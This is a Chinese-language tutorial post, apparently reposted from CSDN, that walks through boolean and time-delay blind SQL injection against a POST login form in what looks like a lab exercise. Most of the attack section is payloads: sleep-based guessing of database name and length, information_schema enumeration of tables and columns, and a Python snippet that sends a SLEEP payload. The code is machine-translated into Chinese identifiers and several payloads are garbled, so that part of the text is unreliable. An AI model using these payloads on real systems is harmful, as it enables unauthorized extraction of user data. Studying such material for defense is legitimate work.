POST方式时间注入(post注入的检测方法)

POST方式时间注入POST 方式时间注入是一种 SQL 注入攻击方法,它利用了 Web 应用程序中对 POST 请求参数处理不当的漏洞。在这种攻击中,攻击者会构造特定的 POST 请求,其中包含恶

POST 方式时间注入是一种 SQL 注入攻击方法,它利用了 Web 应用程序中对 POST 请求参数处理不当的漏洞。在这种攻击中,攻击者会构造特定的 POST 请求,其中包含恶意的时间相关数据,以达到绕过验证、执行非法操作或获取敏感信息的目的。

基于布尔型/时间延迟POST注入

使用黑客栏

请输入“?id=1”

请输入“?id=1”

请输入“?id=1”

由于没有错误消息,我们可以假设这是一个无错误插入。

如果用户未知,则字符插入必须由POST 类型和通用语句确定,例如:

1 或1=1 — # 1) 或1=1– # 1)) 或1=1– #

1\’ 或1=1 — # 1\’) 或1=1– # 1\’) 或1=1– #

1\’ 或1=1 — # 1\’) 或1=1– # 1\’) 或1=1– #

由此我们可以看出,这道题是关于布尔注入的。

猜猜数据库

uname=1\’orleft(database(),1)\’a\’ — #passwd=1 正确返回

uname=1\’orleft(database(),1)\’s\’ — #passwd=1 返回错误

uname=1\’orleft(database(),1)=\’s\’ — #passwd=1 返回正确的值

由此我们可以推断出数据库中的第一个数字是s。然后猜第二个数字:uname=1\’ 或left(database(),2)\’sa\’ — #passwd=1

估计数据库长度

uname=1passwd=1\’ 或if(length(database())=8,1,sleep(5))– #

1、猜测数据库名(可以使用=比较来确定字符范围,并使用二分法逐步缩小范围)

uname=1passwd=1\’ 或If(ascii(substr(database(),1,1))=115,1,sleep(5))– #

uname=1passwd=1\’ 或If(ascii(substr(database(),2,1))=101,1,sleep(5))– #

……。

2. 推断数据库中的表。

猜测第一个数据表中的第一个数字是e 并像这样检索电子邮件.

uname=1passwd=1\’ 或If(ascii(substr((select table_name from information_schema.tables where table_schema=\’security\’ limit 1,1),1,1))=114,1,sleep(5))– #

uname=1passwd=1\’ 或If(ascii(substr((select table_name from information_schema.tables where table_schema=\’security\’ limit 1,1),2,1))=101,1,sleep(5))– #

3. 推断users 表的列。

uname=1passwd=1\’ 或If(ascii(substr((table_name=\’users\’ and table_schema=database() limit 0,1),1,1) select 列名from information_schema.columns) )=105,1,sleep (5))– #

类推获取数据库内容

下面是用Python 编写的示例代码,演示了如何执行POST 时间注入。

导入请求

# 目标网址

网址=\’http://example.com/login\’

# 构建恶意时间注入有效负载

有效负载=\’用户名=管理员\’ AND SLEEP(5)– \’

数据={

“用户名”:有效负载,

\’密码\’: \’密码123\’

}

#发送POST请求

响应=request.post(url, 数据=数据)

#打印响应时间

print(\’响应时间:\’, response.elapsed.total_seconds())

注意:时间注入是一种非法攻击,可能会严重损害他人的系统或数据。请在实际开发过程中遵守法律法规和道德规范。

以上关于#POST方法时间注入源码网络的相关内容仅供大家参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91218.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月21日 下午6:51
下一篇 2024年6月21日 下午6:51

相关推荐

  • k8s实践(k8s实践指南)

    k8s实践这种用法仅用于在公有云服务提供商的云平台上设置Service的场景。在下面的例子中, status.loadBalancer.ingress.ip设置的146.148.47.155为云服务商提供的负载均衡器的IP地址。对该Serv

    网站运维 2024年6月24日
    0
  • 防火墙的分类

    防火墙的分类方法,主要有以下6种:1、软、硬件形式分类:软件防火墙、硬件防火墙、芯片级防火墙。2、防火墙技术分类:包过滤型防火墙、应用代理型防火墙 。3、防火墙

    2024年9月23日
    0
  • 脱掉外衣仔细分析:为什么String是不可变的

    这些都是我们比较常见的类,不过对于他们的实现原理,我们有时候并不能说出个所以然来,甚至有些人写了四五年代码,连最最常见的String如何实现都没有看过,还总是抱

    2024年9月1日
    0
  • 申请106短信平台需要注意什么?

    1、106短信平台申请需要注意短信到达率。总是有不懂行的人会问“你家短信能保证全到达?”短信能否到达跟短信接收者的手机信号、手机是否设置拦 截、运营商通道是否顺

    2024年8月30日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注